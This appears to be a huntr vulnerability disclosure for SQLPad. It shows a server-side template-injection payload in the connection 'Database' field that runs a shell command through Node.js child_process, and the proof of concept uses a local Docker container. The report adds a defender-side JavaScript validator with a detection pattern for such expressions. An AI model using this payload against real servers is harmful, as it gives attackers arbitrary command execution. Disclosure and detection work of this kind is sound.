huntr / bananabr / 46630727-D923-4444-A421-537ECD63E7FB
Mar 11, 2022 - 9:30 p.m.

Template injection in connection test endpoint leads to RCE

2022-03-11 21:30:34
bananabr
www.huntr.dev
Tags: template injection, rce, sqlpad, docker, security vulnerability, admin rights

EPSS: 0.001 (percentile 45.7%)

Description

Please enter a description of the vulnerability.

Proof of Concept

  • Run a local docker instance:
    sudo docker run -p 3000:3000 --name sqlpad -d --env SQLPAD_ADMIN=admin --env SQLPAD_ADMIN_PASSWORD=admin sqlpad/sqlpad:latest
  • Navigate to http://localhost:3000/
  • Click on Connections -> Add connection
  • Choose MySQL as the driver
  • Input the following payload into the Database form field:
    {{ process.mainModule.require('child_process').exec('id>/tmp/pwn') }}
  • Execute the following command to confirm the /tmp/pwn file was created in the container filesystem:
    sudo docker exec -it sqlpad cat /tmp/pwn

Impact

An SQLPad web application user with admin rights is able to run arbitrary commands on the underlying server.
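The payload above works because a connection setting is evaluated as a server-side template expression, which gives it a path to Node.js internals. As an added example that is neither SQLPad's code nor the reporter's, the following defender-side check rejects connection settings that carry a {{ ... }} expression before they reach any template renderer, and rates those that reference Node.js internals as critical. The field names and the sample connections are constructed for the example.

```javascript
// Defender-side validation of connection settings (added example, not SQLPad code).
// Assumes the {{ ... }} template syntax shown in the proof of concept.

// Any server-side template expression inside a connection setting.
const TEMPLATE_TAG = /\{\{[\s\S]*?\}\}/;

// Identifiers that indicate an expression is trying to reach Node.js internals
// rather than a harmless variable substitution.
const NODE_INTERNALS = /\b(process|require|child_process|global|constructor)\b/;

// Classify one connection field. Returns { ok: true } for clean values, otherwise
// a finding with the offending expression and a severity.
function classifyConnectionField(name, value) {
  if (typeof value !== 'string') return { ok: true };
  const tag = value.match(TEMPLATE_TAG);
  if (!tag) return { ok: true };
  const severity = NODE_INTERNALS.test(tag[0]) ? 'critical' : 'warning';
  return { ok: false, field: name, severity, expression: tag[0] };
}

// Run the check over every field of a connection object; an empty array means
// the connection can be stored, anything else should be refused and logged.
function validateConnection(conn) {
  const findings = [];
  for (const [name, value] of Object.entries(conn)) {
    const result = classifyConnectionField(name, value);
    if (!result.ok) findings.push(result);
  }
  return findings;
}

// Constructed samples: a benign connection and one whose Database field carries
// a template expression of the kind used in the report.
const benignConnection = {
  name: 'reporting', driver: 'mysql', host: 'db.internal', database: 'reports',
};
const suspiciousConnection = {
  name: 'x', driver: 'mysql', host: 'db.internal',
  database: "{{ process.mainModule.require('child_process') }}",
};

console.log(validateConnection(benignConnection));      // []
console.log(validateConnection(suspiciousConnection));  // one critical finding on "database"
```

A plain `{{ dbname }}` substitution is still reported, as a warning, so the check also catches template syntax that has no business in a stored credential or host name.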
